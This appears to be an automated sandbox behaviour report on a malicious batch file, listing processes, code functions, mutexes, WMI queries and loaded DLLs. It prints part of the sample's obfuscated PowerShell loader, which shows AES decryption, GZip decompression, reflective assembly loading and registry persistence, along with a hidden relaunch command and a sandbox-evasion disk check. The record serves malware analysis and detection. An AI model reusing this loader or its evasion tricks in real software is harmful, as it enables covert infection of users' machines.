        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB9372D1C NtQuerySystemInformation,StrCmpNIW, | 14_2_0000019AB9372D1C
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D194038: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW, | 9_2_000001F66D194038
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-CDdDgiS8
        Source: C:\Windows\System32\cmd.exe | Code function: 3_3_000001D54F9DE664 | 3_3_000001D54F9DE664
        Source: C:\Windows\System32\cmd.exe | Code function: 3_3_000001D54F9D3438 | 3_3_000001D54F9D3438
        Source: C:\Windows\System32\cmd.exe | Code function: 3_3_000001D54F9DE7E8 | 3_3_000001D54F9DE7E8
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F264 | 3_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA04038 | 3_2_000001D54FA04038
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F3E8 | 3_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_3_00000281B7B9E7E8 | 4_3_00000281B7B9E7E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_3_00000281B7B93438 | 4_3_00000281B7B93438
        Source: C:\Windows\System32\conhost.exe | Code function: 4_3_00000281B7B9E664 | 4_3_00000281B7B9E664
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF3E8 | 4_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BC4038 | 4_2_00000281B7BC4038
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF264 | 4_2_00000281B7BCF264
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF7C776764C | 5_2_00007FF7C776764C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF7C77683B2 | 5_2_00007FF7C77683B2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF7C77620ED | 5_2_00007FF7C77620ED
        Source: C:\Windows\System32\more.com | Code function: 9_3_000001F66CF4E7E8 | 9_3_000001F66CF4E7E8
        Source: C:\Windows\System32\more.com | Code function: 9_3_000001F66CF43438 | 9_3_000001F66CF43438
        Source: C:\Windows\System32\more.com | Code function: 9_3_000001F66CF4E664 | 9_3_000001F66CF4E664
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D194038 | 9_2_000001F66D194038
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F3E8 | 9_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F264 | 9_2_000001F66D19F264
        Source: C:\Windows\System32\winlogon.exe | Code function: 13_3_0000022FCEDFE664 | 13_3_0000022FCEDFE664
        Source: C:\Windows\System32\winlogon.exe | Code function: 13_3_0000022FCEDF3438 | 13_3_0000022FCEDF3438
        Source: C:\Windows\System32\winlogon.exe | Code function: 13_3_0000022FCEDFE7E8 | 13_3_0000022FCEDFE7E8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_3_0000019AB934E7E8 | 14_3_0000019AB934E7E8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_3_0000019AB9343438 | 14_3_0000019AB9343438
        Source: C:\Windows\System32\lsass.exe | Code function: 14_3_0000019AB934E664 | 14_3_0000019AB934E664
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F3E8 | 14_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB9374038 | 14_2_0000019AB9374038
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F264 | 14_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000001A53E9BE7E8 | 15_3_000001A53E9BE7E8
        Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000001A53E9B3438 | 15_3_000001A53E9B3438
        Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000001A53E9BE664 | 15_3_000001A53E9BE664
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF3E8 | 15_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDA4038 | 15_2_000001A53EDA4038
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF264 | 15_2_000001A53EDAF264
        Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002382E97E664 | 16_3_000002382E97E664
        Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002382E97E7E8 | 16_3_000002382E97E7E8
        Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002382E973438 | 16_3_000002382E973438
        Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000027D8F49E664 | 17_3_0000027D8F49E664
        Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000027D8F493438 | 17_3_0000027D8F493438
        Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000027D8F49E7E8 | 17_3_0000027D8F49E7E8
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF264 | 17_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4C4038 | 17_2_0000027D8F4C4038
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF3E8 | 17_2_0000027D8F4CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7343818_3_000001AD09E73438
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7E7E818_3_000001AD09E7E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7E66418_3_000001AD09E7E664
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EA403818_2_000001AD09EA4038
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF3E818_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF26418_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9DE7E819_3_0000020EBF9DE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9D343819_3_0000020EBF9D3438
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9DE66419_3_0000020EBF9DE664
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F26419_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F3E819_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013403819_2_0000020EC0134038
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67E7E820_3_00000229EA67E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67343820_3_00000229EA673438
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67E66420_3_00000229EA67E664
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF3E820_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6A403820_2_00000229EA6A4038
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF26420_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF26421_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDC403821_2_000001777BDC4038
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF3E821_2_000001777BDCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF26422_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6B403822_2_000001590E6B4038
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF3E822_2_000001590E6BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6403823_2_0000021C29A64038
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F3E823_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F26423_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729E66424_3_00000276D729E664
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729E7E824_3_00000276D729E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729343824_3_00000276D7293438
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF26424_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF3E824_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72C403824_2_00000276D72C4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469E7E825_3_0000021D8469E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469343825_3_0000021D84693438
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469E66425_3_0000021D8469E664
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF3E825_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846C403825_2_0000021D846C4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF26425_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6343826_2_0000025BFDA63438
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6E7E826_2_0000025BFDA6E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6E66426_2_0000025BFDA6E664
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9403826_2_0000025BFDA94038
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F3E826_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F26426_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453E66427_3_000001691453E664
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453343827_3_0000016914533438
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453E7E827_3_000001691453E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F26427_2_000001691456F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456403827_2_0000016914564038
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F3E827_2_000001691456F3E8
        Source: C:\Windows\System32\conhost.exeCode function: String function: 00000281B7BC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001777BDC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000021D846C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000016914562680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000276D72C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000025BFDA92680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000229EA6A2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001A53EDA2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001590E6B2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000021C29A62680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000027D8F4C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000020EC0132680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001AD09EA2680 appears 44 times
        Source: C:\Windows\System32\more.comCode function: String function: 000001F66D192680 appears 44 times
        Source: C:\Windows\System32\cmd.exeCode function: String function: 000001D54FA02680 appears 44 times
        Source: C:\Windows\System32\lsass.exeCode function: String function: 0000019AB9372680 appears 44 times
        Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 4219
        Source: Process Memory Space: powershell.exe PID: 8748, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.spyw.evad.winBAT@19/77@1/7
        Source: C:\Windows\System32\cmd.exe Code function: 3_2_000001D54FA03BB8 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8336:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8516:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\2477ed4e-816f-4341-b12d-9227965e6cdf
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12bh2lq2.hrr.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exe WMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWM
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
